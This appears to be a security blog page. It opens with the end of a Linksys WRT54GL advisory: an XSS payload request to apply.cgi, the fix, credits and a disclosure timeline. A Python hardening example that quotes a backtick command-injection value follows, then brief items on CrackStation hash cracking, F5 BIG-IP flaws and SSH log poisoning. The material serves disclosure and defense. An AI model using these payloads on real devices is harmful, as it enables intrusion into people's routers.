=> Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:


http://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123"><img%20src%3d"0"%20onerror%3dalert("XSSed1")>&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=

============ Solution ============

Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.

Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013

Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and gave them detailed vulnerability details
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Sent the Beta Agreement back
29.10.2012 - Linksys gave access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA for the new firmware
17.01.2013 - Linksys informed me about the public release of the mostly fixed version (XSS, OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================



Source: http://packetstormsecurity.com/files/119649
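The fix for the wan_hostname finding is input validation plus keeping the shell out of the command path. The following Python is an added example, not the vendor's code or the advisory's: it shows the vulnerable pattern beside a hardened handler that applies an RFC 1123 allow-list to the hostname and executes via an argv list with no shell. The runner parameter and the helper names are assumptions made for testability; the sample parameter is the one from the advisory's request above.

```python
import re
import subprocess
from urllib.parse import unquote

# RFC 1123 host label: 1-63 letters, digits and hyphens, neither starting nor ending with '-'.
HOSTNAME_RE = re.compile(r"^(?=.{1,63}$)[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?$")

# The wan_hostname value from the advisory's request, exactly as it appears there.
ADVISORY_PARAM = "`%20ping%20192%2e168%2e178%2e101%20`"


def is_valid_hostname(value):
    """Allow-list check: anything outside the label grammar (backticks, spaces, ;) is rejected."""
    return bool(HOSTNAME_RE.match(value))


def build_command_vulnerable(wan_hostname):
    """Mirrors the flaw in the advisory: the raw parameter is pasted into a string a shell will parse."""
    return "hostname " + wan_hostname


def apply_hostname(wan_hostname, runner=None):
    """Hardened handler: validate first, then exec with an argv list so the value is one argument.

    runner is injectable (assumption for testing); by default it runs the command without a shell.
    """
    if not is_valid_hostname(wan_hostname):
        raise ValueError("wan_hostname rejected by allow-list")
    argv = ["hostname", wan_hostname]
    if runner is None:
        runner = lambda a: subprocess.run(a, check=True)
    return runner(argv)


def handle_wan_hostname(encoded_param, runner=None):
    """What apply.cgi should do with the URL-encoded form field: decode, then go through apply_hostname."""
    return apply_hostname(unquote(encoded_param), runner)


def attack_rejected(encoded_param):
    """True when the decoded parameter fails validation, i.e. the hardened handler would refuse it."""
    return not is_valid_hostname(unquote(encoded_param))


if __name__ == "__main__":
    print("decoded advisory parameter:", repr(unquote(ADVISORY_PARAM)))
    print("vulnerable command string:", repr(build_command_vulnerable(unquote(ADVISORY_PARAM))))
    print("hardened handler rejects it:", attack_rejected(ADVISORY_PARAM))
```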


CrackStation.net - Free Password Hash Cracker

Crackstation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password and the correct password for that hash. The hash values are indexed so that it is possible to quickly search the database for a given hash. If the hash is present in the database, the password can be recovered in only a fraction of a second. This cracking method only works for "unsalted" hashes.

Supports: LM, NTLM, md2, md4, md5, md5(md5), md5-half, sha1, sha1(sha1_bin()), sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+  

Source: http://crackstation.net/


F5 Vulnerabilities

F5 BIG-IP versions 11.2.0 and below suffer from an XML external entity injection (XXE) vulnerability.

F5 BIG-IP versions 11.2.0 and below suffer from a remote SQL injection vulnerability.

Source: http://packetstormsecurity.com


Jan 21, 2013

SSH Log Poisoning By Brute Logic

  

It works when you have found a Local File Inclusion.


 
